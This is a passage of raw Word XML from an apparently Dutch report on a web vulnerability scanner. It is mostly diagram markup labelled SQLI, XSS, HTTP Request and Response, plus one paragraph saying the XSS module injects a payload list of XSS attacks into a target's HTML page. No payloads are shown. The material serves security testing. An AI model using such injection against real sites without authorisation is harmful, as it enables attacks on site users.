                    <wp:lineTo x="21499" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="254" name="Rectangle 25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78DE" id="Rectangle 254" o:spid="_x0000_s1026" style="position:absolute;margin-left:379.15pt;margin-top:73.65pt;width:64.3pt;height:9.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26272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CEDDEFB" wp14:editId="16D897E1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1445895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>934085</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2343785" cy="224790"/>
                <wp:effectExtent l="0" t="0" r="18415" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="599" name="Text Box 59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557B24" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="0083347D">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DEFB" id="Text Box 599" o:spid="_x0000_s1137" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:113.85pt;margin-top:73.55pt;width:184.55pt;height:17.7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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2D557B24" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="0083347D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>HTTP Response</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7296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D99D92B" wp14:editId="51D5EC57">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1001395</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>81597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600" name="Chevron 600"/>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831B6" id="Chevron 600" o:spid="_x0000_s1026" type="#_x0000_t55" style="position:absolute;margin-left:78.85pt;margin-top:64.25pt;width:30pt;height:36pt;rotation:180;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728320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73919698" wp14:editId="5F36BBF7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1134745</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>132715</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2343785" cy="224790"/>
                <wp:effectExtent l="0" t="0" r="18415" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="601" name="Text Box 601"/>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CFA18AD" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="0083347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9698" id="Text Box 601" o:spid="_x0000_s1138" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.35pt;margin-top:10.45pt;width:184.55pt;height:17.7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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1CFA18AD" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="0083347D">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00F364DD">
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>HTTP Request</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9344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69121939" wp14:editId="38BDAA30">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3539490</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1714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602" name="Chevron 602"/>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C15F4" id="Chevron 602" o:spid="_x0000_s1026" type="#_x0000_t55" style="position:absolute;margin-left:278.7pt;margin-top:1.35pt;width:30pt;height:36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691456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="166F5725" wp14:editId="709CAAC6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-323850</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>126365</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1210310" cy="1028065"/>
                <wp:effectExtent l="0" t="0" r="34290" b="13335"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21347"/>
                    <wp:lineTo x="21759" y="21347"/>
                    <wp:lineTo x="21759" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="241" name="Rectangle 24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B7EC" id="Rectangle 241" o:spid="_x0000_s1026" style="position:absolute;margin-left:-25.5pt;margin-top:9.95pt;width:95.3pt;height:80.9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" filled="f" strokecolor="#ffd966" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0083347D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252692480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E6EAC44" wp14:editId="4550684A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-252730</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>469265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="341630"/>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49A76" w14:textId="5B77F94A" w:rsidR="002A05E5" w:rsidRPr="005A7556" w:rsidRDefault="002A05E5" w:rsidP="00196256">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="005A7556">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>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AC44" id="Text Box 242" o:spid="_x0000_s1139" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-19.9pt;margin-top:36.95pt;width:85pt;height:26.9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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="53A49A76" w14:textId="5B77F94A" w:rsidR="002A05E5" w:rsidRPr="005A7556" w:rsidRDefault="002A05E5" w:rsidP="00196256">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="005A7556">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>SQL</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>I</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B931D5" w14:textId="3C7F0907" w:rsidR="0083347D" w:rsidRDefault="0083347D"/>
    <w:p w14:paraId="16B9BCC8" w14:textId="481E8349" w:rsidR="0083347D" w:rsidRDefault="00AF12F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253207552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="559F513F" wp14:editId="680E764A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-327660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>198755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="793" name="Text Box 793"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1079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16A6CD" w14:textId="0DDCE906" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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F513F" id="Text Box 793" o:spid="_x0000_s1140" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-25.8pt;margin-top:15.65pt;width:85pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5016A6CD" w14:textId="0DDCE906" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 4.16</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="22731BEB" w14:textId="77777777" w:rsidR="00AF12F4" w:rsidRDefault="00AF12F4"/>
    <w:p w14:paraId="42B7852D" w14:textId="10508392" w:rsidR="008713C1" w:rsidRDefault="00783E53">
      <w:r>
        <w:t>Voor de XSS-</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t>module is er geen voor gedefinieerde lijst met Javascript code regels, omdat je niet te maken hebt met gestandaardiseerde teksten zoals bij SQL</w:t>
      </w:r>
      <w:r w:rsidR="00EE091C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t xml:space="preserve"> die bij een error een bericht toont</w:t>
      </w:r>
      <w:r w:rsidR="00EE091C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE091C">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t>at Javascript wel kan is script runnen. Met andere woorden er kan Javascript code verstuurd worden naar de server die het dan verwerkt. Zoals er in Hoofdstuk 3.2.2</w:t>
      </w:r>
      <w:r w:rsidR="0067573F">
        <w:t xml:space="preserve"> behandeld wordt kunnen er HTML-</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t>elementen script “&lt;script</w:t>
      </w:r>
      <w:r w:rsidR="00846C78">
        <w:t>&gt;” geplaatst worden op een HTML-</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t xml:space="preserve">pagina. Tussen twee van deze elementen kan Javascript code geplaatst worden dat door de </w:t>
      </w:r>
      <w:r w:rsidR="00846C78">
        <w:t>server wordt uitgevoerd. De XSS-</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t>module gebruikt deze feat</w:t>
      </w:r>
      <w:r w:rsidR="00846C78">
        <w:t>ure om zelf opmaat gemaakte XSS-</w:t>
      </w:r>
      <w:r w:rsidR="00A64F61">
        <w:t>script op de HTML-</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t xml:space="preserve">pagina </w:t>
      </w:r>
      <w:r w:rsidR="001138D0">
        <w:t>van het</w:t>
      </w:r>
      <w:r w:rsidR="00846C78">
        <w:t xml:space="preserve"> doelwit te plaatsen. XSS-</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t>module maakt gebruik van een payloa</w:t>
      </w:r>
      <w:r w:rsidR="00846C78">
        <w:t>d, deze bevat een lijst met XSS-</w:t>
      </w:r>
      <w:r w:rsidR="0040697D">
        <w:t>aanvallen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C0F674" w14:textId="009BFC33" w:rsidR="008713C1" w:rsidRDefault="008713C1">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59FD6D9C" wp14:editId="786CCA5B">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19610814" w14:textId="311AC463" w:rsidR="00C373D1" w:rsidRPr="0083347D" w:rsidRDefault="00AF12F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253208576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6AECCD40" wp14:editId="4594B858">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-332740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1461770</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="794" name="Text Box 794"/>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93177" w14:textId="6ABFAC8F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Figuur 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CCD40" id="Text Box 794" o:spid="_x0000_s1141" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-26.2pt;margin-top:115.1pt;width:75pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="08D93177" w14:textId="6ABFAC8F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Figuur 4.18</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008E11B4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252742656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DA3624D" wp14:editId="6FEABBFB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2215515</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>766445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="828675" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="607" name="Text Box 607"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="8286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4FDFA" w14:textId="50D59D8C" w:rsidR="002A05E5" w:rsidRPr="0095104D" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="0095104D">
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:b/>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624D" id="Text Box 607" o:spid="_x0000_s1142" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:174.45pt;margin-top:60.35pt;width:65.25pt;height:18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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0F84FDFA" w14:textId="50D59D8C" w:rsidR="002A05E5" w:rsidRPr="0095104D" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="0095104D">
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:b/>
                        </w:rPr>
                        <w:t>&lt;script&gt;</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AD2519">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252723200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04DB7693" wp14:editId="28C09468">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4746625</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1101090</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="816610" cy="117475"/>
                <wp:effectExtent l="0" t="0" r="21590" b="34925"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="23351"/>
                    <wp:lineTo x="21499" y="23351"/>
                    <wp:lineTo x="21499" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="597" name="Rectangle 597"/>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B1D1" id="Rectangle 597" o:spid="_x0000_s1026" style="position:absolute;margin-left:373.75pt;margin-top:86.7pt;width:64.3pt;height:9.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2176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C49300D" wp14:editId="400F5F1C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4746625</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>870585</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="816610" cy="117475"/>
                <wp:effectExtent l="0" t="0" r="21590" b="34925"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="23351"/>
                    <wp:lineTo x="21499" y="23351"/>
                    <wp:lineTo x="21499" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="596" name="Rectangle 596"/>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6892" id="Rectangle 596" o:spid="_x0000_s1026" style="position:absolute;margin-left:373.75pt;margin-top:68.55pt;width:64.3pt;height:9.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1152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="48497350" wp14:editId="75C274FF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4751070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>530860</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="816610" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="21590" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21843"/>
                    <wp:lineTo x="21499" y="21843"/>
                    <wp:lineTo x="21499" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="595" name="Rectangle 595"/>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8963" id="Rectangle 595" o:spid="_x0000_s1026" style="position:absolute;margin-left:374.1pt;margin-top:41.8pt;width:64.3pt;height:17.8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0128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63014A02" wp14:editId="0DFB1E34">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4111625</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>533400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="568960" cy="683260"/>
                <wp:effectExtent l="0" t="0" r="15240" b="27940"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21680"/>
                    <wp:lineTo x="21214" y="21680"/>
                    <wp:lineTo x="21214" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="594" name="Rectangle 594"/>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5664" id="Rectangle 594" o:spid="_x0000_s1026" style="position:absolute;margin-left:323.75pt;margin-top:42pt;width:44.8pt;height:53.8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9104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2357CF5B" wp14:editId="6BF76C1A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4114165</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>302895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1460500" cy="114300"/>
                <wp:effectExtent l="0" t="0" r="38100" b="38100"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="24000"/>
                    <wp:lineTo x="21788" y="24000"/>
                    <wp:lineTo x="21788" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="593" name="Rectangle 593"/>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16DA" id="Rectangle 593" o:spid="_x0000_s1026" style="position:absolute;margin-left:323.95pt;margin-top:23.85pt;width:115pt;height:9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8080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C6ED93B" wp14:editId="6BB3CE1F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3989070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>187325</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1714500" cy="1143000"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21600"/>
                    <wp:lineTo x="21760" y="21600"/>
                    <wp:lineTo x="21760" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="592" name="Rectangle 592"/>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CC535" id="Rectangle 592" o:spid="_x0000_s1026" style="position:absolute;margin-left:314.1pt;margin-top:14.75pt;width:135pt;height:90pt;z-index:2527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TIhK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" filled="f" strokecolor="#ffd966" strokeweight="2.25pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005700E3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252713984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3527F01E" wp14:editId="2ED9DB8B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>874395</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>98996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578" name="Chevron 57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6D478" id="Chevron 578" o:spid="_x0000_s1026" type="#_x0000_t55" style="position:absolute;margin-left:68.85pt;margin-top:77.95pt;width:30pt;height:36pt;rotation:180;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" adj="10800" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005700E3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252712960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4E6B4374" wp14:editId="76C8220F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1322070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1104265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2343785" cy="224790"/>
                <wp:effectExtent l="0" t="0" r="18415" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="577" name="Text Box 577"/>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1C3504B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="00897DA6">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4374" id="Text Box 577" o:spid="_x0000_s1143" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:104.1pt;margin-top:86.95pt;width:184.55pt;height:17.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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="41C3504B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="00897DA6">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>HTTP Response</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10912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03B9F9E5" wp14:editId="76CF8CFC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-323215</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>647065</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079500" cy="341630"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="576" name="Text Box 576"/>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10132" w14:textId="5E102CCF" w:rsidR="002A05E5" w:rsidRPr="005A7556" w:rsidRDefault="002A05E5" w:rsidP="00897DA6">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="32"/>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F9E5" id="Text Box 576" o:spid="_x0000_s1144" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-25.45pt;margin-top:50.95pt;width:85pt;height:26.9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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="55C10132" w14:textId="5E102CCF" w:rsidR="002A05E5" w:rsidRPr="005A7556" w:rsidRDefault="002A05E5" w:rsidP="00897DA6">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>XSS</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09888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60AD6C49" wp14:editId="1360A359">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-394335</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>304165</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1210310" cy="1028065"/>
                <wp:effectExtent l="0" t="0" r="34290" b="13335"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21347"/>
                    <wp:lineTo x="21759" y="21347"/>
                    <wp:lineTo x="21759" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="255" name="Rectangle 255"/>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5C975" id="Rectangle 255" o:spid="_x0000_s1026" style="position:absolute;margin-left:-31.05pt;margin-top:23.95pt;width:95.3pt;height:80.9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" filled="f" strokecolor="#ffd966" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
